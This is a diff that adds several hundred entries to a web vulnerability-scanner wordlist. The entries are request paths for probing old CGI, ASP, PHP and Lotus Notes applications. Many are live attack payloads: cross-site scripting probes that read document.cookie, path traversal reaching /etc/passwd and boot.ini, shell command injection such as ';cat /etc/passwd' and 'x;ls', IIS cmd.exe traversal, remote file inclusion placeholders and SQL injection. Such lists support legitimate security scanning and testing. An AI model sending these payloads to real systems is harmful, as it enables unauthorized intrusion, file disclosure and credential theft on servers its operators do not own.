324
+ _vti_pvt/users.pwd
325
+ _vti_pvt/writeto.cnf
326
+ _vti_txt/
327
+ _vti_txt/_vti_cnf/
328
+ a%5c.aspx
329
+ a.jsp/<script>alert('Vulnerable')</script>
330
+ a/
331
+ a1disp3.cgi?../../../../../../../../../../etc
332
+ a1disp3.cgi?../../../../../../../../../../etc/passwd
333
+ a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
334
+ a1stats/a1disp3.cgi?../../../../../../../../../../passwd
335
+ a1stats/a1disp3.cgi?../../../../../../../etc/passwd
336
+ a1stats/a1disp4.cgi?../../../../../../../etc/passwd
337
+ a?<script>alert('Vulnerable')</script>
338
+ a_domlog.nsf
339
+ a_security.htm
340
+ ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>
341
+ ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
342
+ ab2/\@AdminViewError
343
+ abonnement.asp
344
+ acart2_0/acart2_0.mdb
345
+ acart2_0/admin/category.asp
346
+ acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>
347
+ acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>
348
+ acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>
349
+ acart2_0/error.asp?msg=<script>alert(\"test\")</script>
350
+ acart2_0/signin.asp?msg=<script>alert(\"test\")</script>
351
+ acartpath/signin.asp?|-|0|404_Object_Not_Found
352
+ acceso/
353
+ access-log
354
+ access.log
355
+ access/
356
+ access_log
357
+ acciones/
358
+ account.nsf
359
+ account/
360
+ accounting/
361
+ accounts.nsf
362
+ accounts/getuserdesc.asp
363
+ achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
364
+ active.log
365
+ activex/
366
+ add.php
367
+ add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>
368
+ add_acl
369
+ add_ftp.cgi
370
+ add_user.php
371
+ addbanner.cgi
372
+ addressbook.php?\"><script>alert(Vulnerable)</script><!--
373
+ addressbook/index.php?name=<script>alert('Vulnerable')</script>
374
+ addressbook/index.php?surname=<script>alert('Vulnerable')</script>
375
+ adduser.cgi
376
+ addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
377
+ adm/
378
+ admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]
379
+ admcgi/contents.htm
380
+ admcgi/scripts/Fpadmcgi.exe
381
+ admentor/adminadmin.asp
382
+ admin-serv/config/admpw
383
+ admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
384
+ admin.cgi
385
+ admin.cgi?list=../../../../../../../../../../etc
386
+ admin.cgi?list=../../../../../../../../../../etc/passwd
387
+ admin.htm
388
+ admin.html
389
+ admin.nsf
390
+ admin.php
391
+ admin.php3
392
+ admin.php4?reg_login=1
393
+ admin.php?en_log_id=0&action=config
394
+ admin.php?en_log_id=0&action=users
395
+ admin.pl
396
+ admin.shtml
397
+ admin/
398
+ admin/admin.php?adminpy=1
399
+ admin/admin.shtml
400
+ admin/admin_phpinfo.php4
401
+ admin/adminproc.asp
402
+ admin/aindex.htm
403
+ admin/auth.php
404
+ admin/browse.asp?FilePath=c:\&Opt=2&level=0
405
+ admin/cfg/configscreen.inc.php+
406
+ admin/cfg/configsite.inc.php+
407
+ admin/cfg/configsql.inc.php+
408
+ admin/cfg/configtache.inc.php+
409
+ admin/cms/htmltags.php
410
+ admin/contextAdmin/contextAdmin.html
411
+ admin/cplogfile.log
412
+ admin/credit_card_info.php
413
+ admin/database/wwForum.mdb
414
+ admin/datasource.asp
415
+ admin/db.php
416
+ admin/db.php?dump_sql=1
417
+ admin/exec.php3
418
+ admin/exec.php3?cmd=cat%20/etc/passwd
419
+ admin/exec.php3?cmd=dir%20c:\
420
+ admin/index.php
421
+ admin/login.php?action=insert&username=test&password=test
422
+ admin/login.php?path=\"></form><form
423
+ admin/modules/cache.php+
424
+ admin/objects.inc.php4
425
+ admin/phpinfo.php
426
+ admin/script.php
427
+ admin/settings.inc.php+
428
+ admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur
429
+ admin/system.php3?cmd=cat%20/etc/passwd
430
+ admin/system.php3?cmd=dir%20c:\
431
+ admin/system_footer.php
432
+ admin/templates/header.php
433
+ admin/upload.php
434
+ admin/wg_user-info.ml
435
+ admin4.nsf
436
+ admin5.nsf
437
+ admin_t/include/aff_liste_langue.php
438
+ adminhot.cgi
439
+ administration/
440
+ administrator/
441
+ administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>
442
+ administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>
443
+ administrator/gallery/uploadimage.php
444
+ administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>
445
+ administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>
446
+ administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>
447
+ administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>
448
+ adminwww.cgi
449
+ admisapi/fpadmin.htm
450
+ adovbs.inc
451
+ adsamples/config/site.csc
452
+ adv/gm001-mc/
453
+ advwebadmin/
454
+ advworks/equipment/catalog_type.asp
455
+ af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
456
+ aff_news.php
457
+ affich.php?image=<script>alert(document.cookie)</script>
458
+ agentadmin.php
459
+ agentes/
460
+ agentrunner.nsf
461
+ aglimpse
462
+ aglimpse.cgi
463
+ akopia/
464
+ aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
465
+ albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
466
+ alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
467
+ alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
468
+ alog.nsf
469
+ amadmin.pl
470
+ ammerum/
471
+ anacondaclip.pl?template=../../../../../../../../../../etc
472
+ anacondaclip.pl?template=../../../../../../../../../../etc/passwd
473
+ analog/
474
+ ans.pl?p=../../../../../usr/bin/id|&blah
475
+ ans/ans.pl?p=../../../../../usr/bin/id|&blah
476
+ anthill/login.php
477
+ antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0
478
+ antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)
479
+ anyboard.cgi
480
+ apache/
481
+ apex/
482
+ apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
483
+ aplogon.html
484
+ app/
485
+ appdet.html
486
+ applicattion/
487
+ applicattions/
488
+ applist.asp
489
+ approval/ts_app.htm
490
+ apps/
491
+ apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
492
+ apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
493
+ archie
494
+ architext_query.cgi
495
+ architext_query.pl
496
+ archivar/
497
+ archive.asp
498
+ archive/
499
+ archive/a_domlog.nsf
500
+ archive/l_domlog.nsf
501
+ archive_forum.asp
502
+ archives/
503
+ archivo/
504
+ ariadne/
505
+ article.cfm?id=1'<script>alert(document.cookie);</script>
506
+ article.php?article=4965&post=1111111111
507
+ article.php?sid=\"><Img
508
+ ash
509
+ ashnews.php
510
+ asp/
511
+ asp/SQLQHit.asp
512
+ asp/sqlqhit.asp
513
+ astrocam.cgi
514
+ atc/
515
+ athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
516
+ athenareg.php?pass=%20;cat%20/etc/passwd
517
+ atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
518
+ atomicboard/index.php?location=../../../../../../../../../../etc/passwd
519
+ auction/auction.cgi?action=
520
+ auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
521
+ auctiondeluxe/auction.pl
522
+ auktion.cgi?menue=../../../../../../../../../../etc
523
+ auktion.cgi?menue=../../../../../../../../../../etc/passwd
524
+ auth.inc.php
525
+ auth/
526
+ auth_data/auth_user_file.txt
527
+ author.asp
528
+ autohtml.php?op=modload&mainfile=x&name=/etc/passwd
529
+ autologon.html?10514
530
+ awebvisit.stat
531
+ awl/auctionweaver.pl
532
+ awstats.pl
533
+ awstats/awstats.pl
534
+ ax-admin.cgi
535
+ ax.cgi
536
+ axis-cgi/buffer/command.cgi
537
+ axs.cgi
538
+ ayuda/
539
+ b2-include/b2edit.showposts.php
540
+ b2-tools/gm-2-b2.php
541
+ ba4.nsf
542
+ backdoor/
543
+ backup/
544
+ badmin.cgi
545
+ bak/
546
+ ban.bak
547
+ ban.dat
548
+ ban.log
549
+ banca/
550
+ banco/
551
+ bandwidth/index.cgi
552
+ bank/
553
+ banmat.pwd
554
+ banner.cgi
555
+ bannereditor.cgi
556
+ banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
557
+ base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
558
+ bash
559
+ basilix.php3
560
+ basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
561
+ basilix/
562
+ basilix/compose-attach.php3
563
+ basilix/mbox-list.php3
564
+ basilix/message-read.php3
565
+ bb-ack.sh
566
+ bb-dnbd/faxsurvey
567
+ bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
568
+ bb-hist?HI
569
+ bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
570
+ bb-histlog.sh
571
+ bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
572
+ bb-rep.sh
573
+ bb-replog.sh
574
+ bb000001.pl<script>alert('Vulnerable')</script>
575
+ bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
576
+ bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
577
+ bbs_forum.cgi
578
+ bbv/
579
+ bc4j.html
580
+ bdata/
581
+ bdatos/
582
+ beta/
583
+ betsie/parserl.pl/<script>alert('Vulnerable')</script>;
584
+ betsie/parserl.pl/<script>alert('XSS')</script>;
585
+ bigconf.cgi
586
+ bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
587
+ bigsam_guestbook.php?displayBegin=9999...9999
588
+ billing.nsf
589
+ billing/billing.apw
590
+ bin/
591
+ bin/CGImail.exe
592
+ bin/admin.pl
593
+ bin/cfgwiz.exe
594
+ bin/common/user_update_passwd.pl
595
+ bin/contents.htm
596
+ bin/fpadmin.htm
597
+ bin/fpremadm.exe
598
+ bin/fpsrvadm.exe
599
+ bizdb1-search.cgi
600
+ biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found
601
+ biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found
602
+ blah-whatever-badfile.jsp
603
+ blah-whatever.jsp
604
+ blah123.php
605
+ blah_badfile.shtml
606
+ blahb.ida
607
+ blahb.idq
608
+ blog/
609
+ blog/mt-check.cgi
610
+ blog/mt-load.cgi
611
+ blog/mt.cfg
612
+ bmp/
613
+ bmp/JSPClient.java
614
+ bmp/README.txt
615
+ bmp/global-web-application.xml
616
+ bmp/mime.types
617
+ bmp/setconn.jsp
618
+ bmp/sqljdemo.jsp
619
+ bnbform
620
+ bnbform.cgi
621
+ board/index.php
622
+ board/philboard_admin.asp+
623
+ boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
624
+ boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found
625
+ book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
626
+ bookmark.nsf
627
+ books.nsf
628
+ boot/
629
+ boozt/admin/index.cgi?section=5&input=1
630
+ bottom.html
631
+ bsguest.cgi?email=x;ls
632
+ bslist.cgi?email=x;ls
633
+ buddies.blt
634
+ buddy.blt
635
+ buddylist.blt
636
+ bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>
637
+ bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>
638
+ bugtest+/+
639
+ build.cgi
640
+ bulk/bulk.cgi
641
+ busytime.nsf
642
+ buy/
643
+ buynow/
644
+ bytehoard/index.php?infolder=../../../../../../../../../../../etc/
645
+ c/
646
+ c/winnt/system32/cmd.exe?/c+dir+/OG
647
+ c32web.exe/ChangeAdminPassword
648
+ c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
649
+ c_download.cgi
650
+ ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
651
+ ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
652
+ ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
653
+ ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f
654
+ ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>
655
+ cache-stats/
656
+ cached_feed.cgi
657
+ cachemgr.cgi
658
+ caja/
659
+ cal_make.pl?p0=../../../../../../../../../../etc
660
+ cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
661
+ calendar
662
+ calendar.nsf
663
+ calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
664
+ calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
665
+ calendar.pl
666
+ calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
667
+ calendar/index.cgi
668
+ calendar_admin.pl?config=|cat%20/etc/passwd|
669
+ calender_admin.pl
670
+ campas?%0acat%0a/etc/passwd%0a
671
+ carbo.dll
672
+ card/
673
+ cards/
674
+ cart.pl
675
+ cart.pl?db='
676
+ cart/
677
+ cart32.exe
678
+ cartcart.cgi
679
+ cartmanager.cgi
680
+ cash/
681
+ catalog.nsf
682
+ catalog/includes/include_once.php
683
+ categorie.php3?cid=june
684
+ catinfo
685
+ catinfo?<u><b>TESTING
686
+ caupo/admin/admin_workspace.php
687
+ cbmc/forums.cgi
688
+ cbms/cbmsfoot.php
689
+ cbms/changepass.php
690
+ cbms/editclient.php
691
+ cbms/passgen.php
692
+ cbms/realinv.php
693
+ cbms/usersetup.php
694
+ ccard/
695
+ ccbill-local.cgi?cmd=MENU
696
+ ccbill-local.pl?cmd=MENU
697
+ ccbill/secure/ccbill.log
698
+ ccbill/whereami.cgi
699
+ cd-cgi/sscd_suncourier.pl
700
+ cd/
701
+ cdrom/
702
+ cehttp/property/
703
+ cehttp/trace
704
+ cersvr.nsf
705
+ cert/
706
+ certa.nsf
707
+ certificado/
708
+ certificate
709
+ certificates
710
+ certlog.nsf
711
+ certsrv.nsf
712
+ certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
713
+ certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
714
+ cfcache.map
715
+ cfdocs.map
716
+ cfdocs/cfcache.map
717
+ cfdocs/cfmlsyntaxcheck.cfm
718
+ cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
719
+ cfdocs/exampleapp/email/application.cfm
720
+ cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
721
+ cfdocs/exampleapp/publish/admin/addcontent.cfm
722
+ cfdocs/exampleapp/publish/admin/application.cfm
723
+ cfdocs/examples/httpclient/mainframeset.cfm
724
+ cfdocs/expeval/displayopenedfile.cfm
725
+ cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
726
+ cfdocs/expeval/openfile.cfm
727
+ cfdocs/expeval/sendmail.cfm
728
+ cfdocs/snippets/evaluate.cfm
729
+ cfdocs/snippets/fileexists.cfm
730
+ cfdocs/snippets/gettempdirectory.cfm
731
+ cfdocs/snippets/viewexample.cfm
732
+ cfgwiz.exe
733
+ cfide/Administrator/startstop.html
734
+ cfide/administrator/index.cfm
735
+ cgforum.cgi
736
+ cgi-bin-sdb/printenv
737
+ cgi-bin/
738
+ cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
739
+ cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
740
+ cgi-bin/%2e%2e/abyss.conf
741
+ cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
742
+ cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
743
+ cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
744
+ cgi-bin/.access
745
+ cgi-bin/.cobalt
746
+ cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
747
+ cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
748
+ cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
749
+ cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
750
+ cgi-bin/.fhp
751
+ cgi-bin/.htaccess
752
+ cgi-bin/.htaccess.old
753
+ cgi-bin/.htaccess.save
754
+ cgi-bin/.htaccess~
755
+ cgi-bin/.htpasswd
756
+ cgi-bin/.nsconfig
757
+ cgi-bin/.passwd
758
+ cgi-bin/.www_acl
759
+ cgi-bin/.wwwacl
760
+ cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
761
+ cgi-bin//_vti_pvt/doctodep.btr
762
+ cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
763
+ cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
764
+ cgi-bin/AT-admin.cgi
765
+ cgi-bin/AT-generate.cgi
766
+ cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
767
+ cgi-bin/AnyBoard.cgi
768
+ cgi-bin/AnyForm
769
+ cgi-bin/AnyForm2
770
+ cgi-bin/Backup/add-passwd.cgi
771
+ cgi-bin/CGImail.exe
772
+ cgi-bin/CSMailto.cgi
773
+ cgi-bin/CSMailto/CSMailto.cgi
774
+ cgi-bin/Cgitest.exe
775
+ cgi-bin/Count.cgi
776
+ cgi-bin/DCFORMS98.CGI
777
+ cgi-bin/DCShop/auth_data/auth_user_file.txt
778
+ cgi-bin/DCShop/orders/orders.txt
779
+ cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
780
+ cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
781
+ cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
782
+ cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
783
+ cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
784
+ cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
785
+ cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
786
+ cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
787
+ cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
788
+ cgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script>
789
+ cgi-bin/GW5/GWWEB.EXE
790
+ cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
791
+ cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
792
+ cgi-bin/GWWEB.EXE?HELP=bad-request
793
+ cgi-bin/ImageFolio/admin/admin.cgi
794
+ cgi-bin/MachineInfo
795
+ cgi-bin/MsmMask.exe
796
+ cgi-bin/MsmMask.exe?mask=/junk334
797
+ cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
798
+ cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
799
+ cgi-bin/Pbcgi.exe
800
+ cgi-bin/SGB_DIR/superguestconfig
801
+ cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
802
+ cgi-bin/Upload.pl
803
+ cgi-bin/VsSetCookie.exe?
804
+ cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
805
+ cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\
806
+ cgi-bin/WS_FTP.ini
807
+ cgi-bin/Webnews.exe
808
+ cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
809
+ cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
810
+ cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
811
+ cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
812
+ cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
813
+ cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
814
+ cgi-bin/add_ftp.cgi
815
+ cgi-bin/addbanner.cgi
816
+ cgi-bin/adduser.cgi
817
+ cgi-bin/admin.cgi
818
+ cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
819
+ cgi-bin/admin.php
820
+ cgi-bin/admin.php3
821
+ cgi-bin/admin.pl
822
+ cgi-bin/admin/admin.cgi
823
+ cgi-bin/admin/setup.cgi
824
+ cgi-bin/adminhot.cgi
825
+ cgi-bin/adminwww.cgi
826
+ cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
827
+ cgi-bin/aglimpse
828
+ cgi-bin/aglimpse.cgi
829
+ cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
830
+ cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
831
+ cgi-bin/amadmin.pl
832
+ cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
833
+ cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
834
+ cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
835
+ cgi-bin/anyboard.cgi
836
+ cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
837
+ cgi-bin/archie
838
+ cgi-bin/architext_query.cgi
839
+ cgi-bin/architext_query.pl
840
+ cgi-bin/ash
841
+ cgi-bin/astrocam.cgi
842
+ cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
843
+ cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
844
+ cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
845
+ cgi-bin/auctiondeluxe/auction.pl
846
+ cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
847
+ cgi-bin/auth_data/auth_user_file.txt
848
+ cgi-bin/awl/auctionweaver.pl
849
+ cgi-bin/awstats.pl
850
+ cgi-bin/awstats/awstats.pl
851
+ cgi-bin/ax-admin.cgi
852
+ cgi-bin/ax.cgi
853
+ cgi-bin/axs.cgi
854
+ cgi-bin/badmin.cgi
855
+ cgi-bin/banner.cgi
856
+ cgi-bin/bannereditor.cgi
857
+ cgi-bin/bash
858
+ cgi-bin/bb-ack.sh
859
+ cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
860
+ cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
861
+ cgi-bin/bb-histlog.sh
862
+ cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
863
+ cgi-bin/bb-rep.sh
864
+ cgi-bin/bb-replog.sh
865
+ cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
866
+ cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
867
+ cgi-bin/bbs_forum.cgi
868
+ cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;
869
+ cgi-bin/bigconf.cgi
870
+ cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
871
+ cgi-bin/bizdb1-search.cgi
872
+ cgi-bin/blog/
873
+ cgi-bin/blog/mt-check.cgi
874
+ cgi-bin/blog/mt-load.cgi
875
+ cgi-bin/blog/mt.cfg
876
+ cgi-bin/bnbform
877
+ cgi-bin/bnbform.cgi
878
+ cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
879
+ cgi-bin/boozt/admin/index.cgi?section=5&input=1
880
+ cgi-bin/bsguest.cgi?email=x;ls
881
+ cgi-bin/bslist.cgi?email=x;ls
882
+ cgi-bin/build.cgi
883
+ cgi-bin/bulk/bulk.cgi
884
+ cgi-bin/c32web.exe/ChangeAdminPassword
885
+ cgi-bin/c_download.cgi
886
+ cgi-bin/cached_feed.cgi
887
+ cgi-bin/cachemgr.cgi
888
+ cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
889
+ cgi-bin/calendar
890
+ cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
891
+ cgi-bin/calendar.pl
892
+ cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
893
+ cgi-bin/calendar/index.cgi
894
+ cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
895
+ cgi-bin/calender_admin.pl
896
+ cgi-bin/campas?%0acat%0a/etc/passwd%0a
897
+ cgi-bin/cart.pl
898
+ cgi-bin/cart.pl?db='
899
+ cgi-bin/cartmanager.cgi
900
+ cgi-bin/cbmc/forums.cgi
901
+ cgi-bin/ccbill-local.cgi?cmd=MENU
902
+ cgi-bin/ccbill-local.pl?cmd=MENU
903
+ cgi-bin/cfgwiz.exe
904
+ cgi-bin/cgforum.cgi
905
+ cgi-bin/cgi-lib.pl
906
+ cgi-bin/cgi-test.exe
907
+ cgi-bin/cgi_process
908
+ cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
909
+ cgi-bin/cgicso?query=AAA
910
+ cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
911
+ cgi-bin/cgimail.exe
912
+ cgi-bin/cgitest.exe
913
+ cgi-bin/cgiwrap
914
+ cgi-bin/cgiwrap/%3Cfont%20color=red%3E
915
+ cgi-bin/cgiwrap/~@USERS
916
+ cgi-bin/cgiwrap/~JUNK(5)
917
+ cgi-bin/cgiwrap/~root
918
+ cgi-bin/change-your-password.pl
919
+ cgi-bin/classifieds
920
+ cgi-bin/classifieds.cgi
921
+ cgi-bin/classifieds/classifieds.cgi
922
+ cgi-bin/classifieds/index.cgi
923
+ cgi-bin/clickcount.pl?view=test
924
+ cgi-bin/clickresponder.pl
925
+ cgi-bin/cmd.exe?/c+dir
926
+ cgi-bin/cmd1.exe?/c+dir
927
+ cgi-bin/code.php
928
+ cgi-bin/code.php3
929
+ cgi-bin/com5...................................................................................................................................................................................................
930
+ cgi-bin/com5.java
931
+ cgi-bin/com5.pl
932
+ cgi-bin/commandit.cgi
933
+ cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
934
+ cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
935
+ cgi-bin/common/listrec.pl
936
+ cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
937
+ cgi-bin/compatible.cgi
938
+ cgi-bin/contents.htm
939
+ cgi-bin/count.cgi
940
+ cgi-bin/counter-ord
941
+ cgi-bin/counterbanner
942
+ cgi-bin/counterbanner-ord
943
+ cgi-bin/counterfiglet-ord
944
+ cgi-bin/counterfiglet/nc/
945
+ cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
946
+ cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
947
+ cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
948
+ cgi-bin/csNews.cgi
949
+ cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
950
